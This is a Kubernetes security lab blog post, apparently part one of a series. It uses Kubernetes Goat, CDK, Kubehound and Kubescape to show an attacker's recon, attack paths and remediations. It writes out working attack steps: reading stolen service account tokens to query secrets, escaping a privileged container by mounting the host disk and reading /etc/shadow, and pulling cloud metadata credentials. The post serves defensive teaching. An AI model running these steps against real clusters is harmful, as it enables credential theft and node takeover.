Skip to main content

Command Palette

Search for a command to run...

Attacking Kubernetes: Offensive Recon and Attack Path Analysis with CDK, Kubehound, and Kubescape

Part 1 - Lab setup, attacker simulation, and finding exploitable misconfigurations

Published
12 min read
Attacking Kubernetes: Offensive Recon and Attack Path Analysis with CDK, Kubehound, and Kubescape

One of the best ways to build better Kubernetes security is to understand what an attacker actually does after they get into a cluster. Reading about it is one thing, but running through it hands-on in a lab environment makes the risks much more concrete. This post covers how I set up a local Kubernetes lab using WSL and Kind, and walked through the offensive side using CDK, Kubehound, and Kubescape.

Part 2 will cover the detection side with Falco, Tetragon, kube-bench, and Wazuh.

Tools Overview

Kubernetes Goat (GitHub) is a deliberately vulnerable Kubernetes environment built for learning attack and defense. It ships with around 20 attack scenarios covering privilege escalation, container escape, SSRF, secret exposure, and lateral movement. Think of it as DVWA for Kubernetes.

CDK (Container and Kubernetes Dewdrops) (GitHub) is an offensive toolkit designed to be dropped inside a compromised container. It is a single static binary that automatically enumerates the container environment, checks for escape vectors, and identifies accessible credentials and misconfigurations.

Kubehound (GitHub) is an attack path analysis tool built by Datadog's security research team. It ingests your cluster's state (RBAC, workloads, service accounts, network policies) and generates a graph of all viable attack paths. It answers questions like "which pod can reach cluster-admin in three hops?" and "what is the blast radius if this service account token is stolen?"

Kubescape (GitHub) is a CNCF security posture tool that scans your cluster against established frameworks including NSA-CISA Kubernetes Hardening Guidance, MITRE ATT&CK for Containers, and CIS Benchmarks. It scores findings and provides remediation guidance for each control.


Prerequisites

All of the following was set up inside WSL (Ubuntu 22.04) on Windows.

To verify Kind is working inside WSL:

kind version
kubectl version --client

Lab Setup

1. Kubernetes Goat on WSL with Kind

# Clone the repo
git clone https://github.com/madhuakula/kubernetes-goat.git
cd kubernetes-goat

# Create a Kind cluster
kind create cluster --name kubernetes-goat

# Confirm your context
kubectl config current-context
# Expected output: kind-kubernetes-goat

# Deploy Kubernetes Goat
bash setup-kubernetes-goat.sh

# Verify pods are running
kubectl get pods --all-namespaces

Once everything is up, port-forward the scenario guide to your browser:

bash access-kubernetes-goat.sh
# Opens at http://localhost:1234

The guide walks through each scenario. The ones most relevant to this post are:

  1. Sensitive keys in environment variables

  2. Docker-in-Docker (DinD) abuse

  3. SSRF to cloud metadata

  4. Privileged container escape

  5. Service account token abuse


2. CDK

CDK is a single binary. You do not install it on your host machine. The intent is to transfer it into a compromised container the way an attacker would.

Inside WSL, download the binary:

curl -L https://github.com/cdk-team/CDK/releases/latest/download/cdk_linux_amd64 -o cdk
chmod +x cdk

To copy it into a running pod:

kubectl cp ./cdk <namespace>/<pod-name>:/tmp/cdk

3. Kubehound

Kubehound uses Docker Compose to run a local graph database backend (JanusGraph and Elasticsearch). Run it from within WSL with Docker Desktop's WSL2 integration active.

git clone https://github.com/DataDog/KubeHound.git
cd KubeHound

# Start the backend stack
docker compose -f deployments/kubehound/docker-compose.yaml up -d

# Wait for services to be healthy, then run the ingestor
# KUBECONFIG should point to your Kind cluster
./bin/kubehound

Once ingestion completes, the Kubehound UI (Jupyter notebooks with pre-built attack path queries) is available at http://localhost:8888.


4. Kubescape

curl -s https://raw.githubusercontent.com/kubescape/kubescape/master/install.sh | /bin/bash

# Confirm installation
kubescape version

Simulating an Attacker Inside a Compromised Pod

For this walkthrough, I exec'd into one of the Kubernetes Goat pods to simulate what an attacker would do after gaining initial access to a container.

kubectl exec -it <pod-name> -n <namespace> -- /bin/bash

Step 1: CDK Evaluate

The first thing an attacker does is understand the environment. CDK's evaluate command runs automated recon in one shot:

/tmp/cdk evaluate

CDK checks for:

  • Container runtime (Docker, containerd, etc.)

  • Linux capabilities (CAP_SYS_ADMIN, CAP_NET_ADMIN, CAP_DAC_OVERRIDE, etc.)

  • Mounted paths (Docker socket, host filesystem mounts)

  • Kubernetes service account token presence and permissions

  • Cloud provider metadata endpoints (AWS IMDS, GCP metadata)

  • Reachability of the Kubernetes API server

  • Whether the container is running as root or with --privileged

  • Known CVEs (CVE-2019-5736 runc escape, CVE-2020-15257 containerd-shim, etc.)

A representative output on a privileged Kubernetes Goat container looks like this:

[  Information Gathering - System  ]
Container Runtime: containerd
Current User: root

[  Information Gathering - Services  ]
Kubernetes API: https://10.96.0.1:443 (reachable)
ServiceAccount Token: FOUND at /var/run/secrets/kubernetes.io/serviceaccount/token
Kubernetes Namespace: default

[  Information Gathering - Sensitive Files  ]
Possible K8s service account token: /var/run/secrets/kubernetes.io/serviceaccount/token

[  Exploit - Privileged Container  ]
[!] CAP_SYS_ADMIN detected. Host filesystem may be accessible.
[!] /host/etc found - host root may be mounted at /host

[  Available Exploits  ]
[+] cdk run --exploit mount-disk
[+] cdk run --exploit service-account-token-collector
[+] cdk run --exploit k8s-node-apiserver

The last block is where the attacker's next steps come from. CDK identifies exactly which exploits are viable given the current environment and prints them directly.


Step 2: Service Account Token Abuse

By default, Kubernetes mounts a service account token into every pod at /var/run/secrets/kubernetes.io/serviceaccount/token. This token carries whatever RBAC permissions have been granted to the associated service account. In many clusters (and across multiple Kubernetes Goat scenarios), those permissions are broader than intended.

CDK can collect and test the token automatically:

/tmp/cdk run --exploit service-account-token-collector

Or manually:

TOKEN=$(cat /var/run/secrets/kubernetes.io/serviceaccount/token)
APISERVER=https://10.96.0.1:443
CACERT=/var/run/secrets/kubernetes.io/serviceaccount/ca.crt

# List secrets in the default namespace
curl -s --cacert $CACERT \
  -H "Authorization: Bearer $TOKEN" \
  $APISERVER/api/v1/namespaces/default/secrets

# Attempt to list pods cluster-wide
curl -s --cacert $CACERT \
  -H "Authorization: Bearer $TOKEN" \
  $APISERVER/api/v1/pods

In Kubernetes Goat, several service accounts can list secrets cluster-wide, create pods, or both. A service account that can create pods is particularly dangerous because it allows an attacker to schedule a new privileged pod, which is the next step toward node compromise.


Step 3: Privileged Container Escape

Kubernetes Goat Scenario 4 runs a container with securityContext.privileged: true and the host filesystem mounted. CDK detects this automatically and surfaces the exploit:

/tmp/cdk run --exploit mount-disk

What this does is mount the host's root disk device inside the container, then use chroot to get a shell in the host OS. At that point, you are no longer inside the container. You have root on the underlying Kubernetes node.

Doing this manually to understand what is happening:

# Identify the host disk
fdisk -l

# Mount it
mkdir /tmp/hostfs
mount /dev/sda1 /tmp/hostfs

# Chroot into the host
chroot /tmp/hostfs /bin/bash

# You are now on the node
hostname
cat /etc/shadow

Step 4: Cloud Metadata Recon (SSRF via IMDS)

This step applies to cloud-hosted clusters, but is worth understanding since Kubernetes Goat includes an SSRF scenario that simulates it. In a real EKS or GKE cluster, the instance metadata service is reachable from pods unless explicitly blocked via network policy or IMDS hop-limit configuration.

# AWS IMDSv1 (no token required, which is the problem)
curl http://169.254.169.254/latest/meta-data/iam/security-credentials/

# GCP metadata
curl -H "Metadata-Flavor: Google" \
  http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token

CDK checks for metadata endpoint reachability automatically during evaluate, so attackers get this information without having to know the endpoint addresses in advance.


Mapping Attack Paths with Kubehound

Where CDK answers "what can I do from this pod right now", Kubehound answers "how does this pod connect to the rest of the cluster". After ingestion, open the Jupyter UI at http://localhost:8888. Kubehound ships with pre-built query notebooks.

Find all paths from any pod to cluster-admin:

g.V().hasLabel('Pod').repeat(
    outE().inV().simplePath()
).until(
    has('critical', true)
).path().by('name').by(label).limit(20).toList()

Find over-permissioned service accounts:

g.V().hasLabel('ServiceAccount')
  .where(outE('PERMISSION').inV().has('resource', 'secrets').has('scope', 'cluster'))
  .values('name').toList()

Find pods with direct escape paths to nodes:

g.V().hasLabel('Pod')
  .where(outE('EXPLOIT').inV().hasLabel('Node'))
  .values('name').toList()

The graph view makes attack chains navigable in a way that a flat list of findings does not. You can see the specific misconfiguration that serves as the pivot point at each hop, which directly informs remediation priority.

The attack paths that surfaced on my Kubernetes Goat setup:

  • Pod with list secrets permission on the cluster scope -> retrieve a second service account token -> that token has create pods -> deploy a privileged pod -> node escape

  • Privileged container with hostPath mount -> node access -> read kubelet credentials -> API server access as a node identity

  • Default namespace service account -> get/list pods cluster-wide -> identify pods with mounted secrets -> targeted credential theft


Running Kubescape

Run Kubescape against the live Kubernetes Goat cluster to see the misconfigurations mapped to security frameworks.

Scan against the NSA-CISA framework:

kubescape scan framework nsa --kubeconfig ~/.kube/config

Scan against MITRE ATT&CK for Containers:

kubescape scan framework mitre --kubeconfig ~/.kube/config

Full scan across all frameworks, output to JSON:

kubescape scan --enable-host-scan -v \
  --format json \
  --output kubescape-results.json

Scope to specific namespaces:

kubescape scan --include-namespaces default,kube-system

Key Findings and How Attackers Leverage Them

The following are the findings Kubescape surfaces on a fresh Kubernetes Goat cluster, with the direct attacker path each one enables.

Automounted service account tokens in all pods

Framework: NSA-CISA / MITRE T1552.007 (Unsecured Credentials: Container API)

Every pod gets a service account token mounted by default unless automountServiceAccountToken: false is explicitly set at the pod or namespace level. Combined with over-permissive RBAC, this is one of the most common paths to cluster-wide access.

Attacker path: Exec into any pod -> read the token -> query the API server -> enumerate or escalate depending on what RBAC the service account has.

Fix: Set automountServiceAccountToken: false at the namespace or pod spec level for any workload that does not need API access.


Privileged containers

Framework: NSA-CISA / MITRE T1611 (Escape to Host)

Containers running with securityContext.privileged: true have full access to the host kernel's features. Combined with a hostPath mount or direct access to a block device, this is a straightforward container escape.

Attacker path: Shell in container -> mount host disk -> chroot to host OS -> root on the node.

Fix: Pod Security Admission (PSA) with the restricted or baseline profile enforces at admission time and blocks privileged containers from being scheduled.


No Network Policies defined

Framework: NSA-CISA

With no NetworkPolicy resources in the cluster, every pod can communicate with every other pod across all namespaces. There is no lateral movement barrier.

Attacker path: Compromised pod in default namespace -> reach pods in kube-system -> access monitoring agents, internal APIs, or services with elevated permissions.

Fix: Default-deny NetworkPolicy per namespace with explicit ingress/egress rules for each workload.


Secrets exposed as environment variables

Framework: MITRE T1552 (Unsecured Credentials)

Kubernetes Goat Scenario 1 deliberately stores credentials as environment variables. CDK's evaluate command prints all environment variables, so this information is available to an attacker within seconds of landing in the container. The same data is also visible in kubectl describe pod to anyone with pod read access.

Attacker path: CDK evaluate -> environment variables printed -> credentials harvested immediately.

Fix: Mount secrets as files from Kubernetes Secrets objects rather than injecting them as environment variables. Better still, use an external secrets manager with short-lived credentials (AWS Secrets Manager, HashiCorp Vault, Azure Key Vault).


Host PID or Host Network namespace sharing

Framework: MITRE T1543 (Create or Modify System Process)

Pods with hostPID: true can see and signal all processes running on the host. Pods with hostNetwork: true bind to the node's network interfaces and bypass all Kubernetes-level network policies.

Attacker path (hostPID): View host process list -> ptrace or signal processes -> credential theft from process memory.

Attacker path (hostNetwork): Bypass pod-level network isolation -> directly reach cluster-internal services that are otherwise firewalled from the pod network.


No resource limits on pods

Framework: NSA-CISA

Less obviously offensive, but no CPU or memory limits means an attacker can run high-intensity workloads (cryptomining, brute-force) without triggering resource-based anomaly detection. It also makes it harder to identify abnormal compute usage during an incident.


Putting It All Together

Running through this lab end to end, the picture that emerges is consistent with what we see in real cloud environments. Initial access to a single pod, combined with a handful of common misconfigurations, creates a realistic path to cluster-admin or node compromise without needing any CVE exploitation at all.

CDK makes the attacker's first few minutes very fast. Within 30 seconds of landing in a container, evaluate surfaces service account tokens, escape vectors, and cloud metadata reachability. Kubehound then shows you how those individual issues connect into multi-hop attack chains. Kubescape maps all of it to framework controls with risk scores.

The value of running this locally is not just understanding the individual tools. It is seeing how misconfigurations that seem low-risk in isolation (a service account with list permissions, a container without resource limits) combine into something much more serious.


What is Coming in Part 2

Now that the attacker's activity at each stage is clear, Part 2 covers how to detect it.

Falco for runtime detection of exactly the behavior CDK produces: unexpected binary execution inside containers, service account token reads, unusual mount syscalls, and API server calls that match enumeration patterns.

Tetragon for eBPF-based enforcement at the syscall level. Unlike Falco, Tetragon can terminate the offending process in-kernel, not just alert on it.

kube-bench for CIS Benchmark scanning at the node and control plane level, complementing the workload-level findings from Kubescape with node configuration checks.

Wazuh for SIEM integration. Pulling Kubernetes audit logs, Falco alerts, and node-level logs into Wazuh to build correlation rules that connect the individual signals into a detection pipeline.

The goal for Part 2 is that every attacker step described in this post has a corresponding detection signal and a clear log source.


Resources: